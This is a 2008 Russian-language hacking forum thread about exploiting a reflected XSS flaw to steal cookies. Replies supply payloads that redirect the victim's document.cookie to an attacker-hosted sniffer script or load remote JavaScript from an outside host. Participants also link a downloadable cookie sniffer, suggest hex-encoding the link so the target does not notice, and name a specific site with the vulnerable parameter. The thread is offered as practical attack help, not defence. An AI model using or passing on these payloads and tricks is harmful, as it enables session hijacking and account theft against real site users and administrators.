Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
12.12.2008, 19:56
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
Пассивная ХСС
Здравствуйте. Вот нашёл на 1 сайте пассивную хсс ( /open.php?url='><script>alert(/xak/)</script> )
1 Вопрос, что можно сделать имея её? Возможно как-то украсть куки, и что-то вроде?
Заранее спасибо за ваши ответы.
|
|
|
12.12.2008, 20:02
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Дать тому, у кого хочешь свистнуть куки, такую ссылку:
/open.php?url='<script>window.location.href='http://твой_сайт/s.php?'+document.cookie;</script>
где s.php - твой снифер
|
|
|
|
12.12.2008, 20:03
|
|
Участник форума
Регистрация: 26.11.2007
Сообщений: 266
Провел на форуме:
3412198
Репутация:
341
|
|
мда, почитай статьи по xss и вопросы пропадут сами собой, всё просто, любой поймёт
|
|
|
|
12.12.2008, 20:05
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 278
Провел на форуме:
1495545
Репутация:
242
|
|
вот тебе мой снифер, может отправлять на почту, а может писать в файл. определяет некоторую инфу о юзере.
http://depositfiles.com/files/d3gf1m5m9
p.s. лучше написать свой ява скрипт, и залить на свой сервер с снифером, ссылка будет лучше
/open.php?url='<script src='http://www.blabla.ru/a.js'></script>
Последний раз редактировалось preda1or; 12.12.2008 в 20:08..
|
|
|
|
12.12.2008, 20:38
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
Просто видел у 1 человек нашёл пассивный хсс, и написал снифер вроде, и поставил его на хостинг, и когда заходиш на сайт http://тут его сайт.narod.ru то куки воруются у того сайта с пассивной хссшкой.
|
|
|
|
12.12.2008, 20:45
|
|
Познающий
Регистрация: 06.12.2008
Сообщений: 33
Провел на форуме:
75860
Репутация:
16
|
|
Сообщение от Arigona
Здравствуйте. Вот нашёл на 1 сайте пассивную хсс ( /open.php?url='><script>alert(/xak/)</script> )
1 Вопрос, что можно сделать имея её? Возможно как-то украсть куки, и что-то вроде?
Заранее спасибо за ваши ответы.
Возможно при условии, что юзер (админ) окажется лохом и кликнет по ссылке, которую ты ему пришлешь. Только ссылку, которую тебе дал Pashkela запиши в hex или криптани, а то так палевно слишком.
Сообщение от Arigona
Просто видел у 1 человек нашёл пассивный хсс, и написал снифер вроде, и поставил его на хостинг, и когда заходиш на сайт http://тут его сайт.narod.ru то куки воруются у того сайта с пассивной хссшкой.
Это либо активка была
Последний раз редактировалось +BemepoK+; 12.12.2008 в 20:48..
|
|
|
|
12.12.2008, 20:50
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
Вот есть просто на сайте хсс пассивная вроде, http://freetmd.net/redir.php?url='><script>alert(/xak/)</script>
Как тут куки своровать?( Просто тестировал над собой, и куки не присылалисЬ, присылалась только инфа а куки нет.
|
|
|
|
12.12.2008, 20:56
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Что значит "как"? Посты в теме читал вообще?
|
|
|
|
12.12.2008, 20:59
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
Pashkela, читал. Прочитай мой последний пост '' повнимательней '' пожалуйста.
|
|
|
|
12.12.2008, 21:07
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
"Просто тестировал над собой"
и что? Это должно мне о чем-то сказать? Например о том, что ты вообще понятие имеешь что такое снифер? И умеешь им ПРАВИЛЬНО пользоваться?
Вот правильный снифер, которым, например, пользуюсь давно уже:
Скачать снифер |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Dezzter]](/avatars/avatar45529.gif){kind=avatar}
Похожие темы
Линейный вид
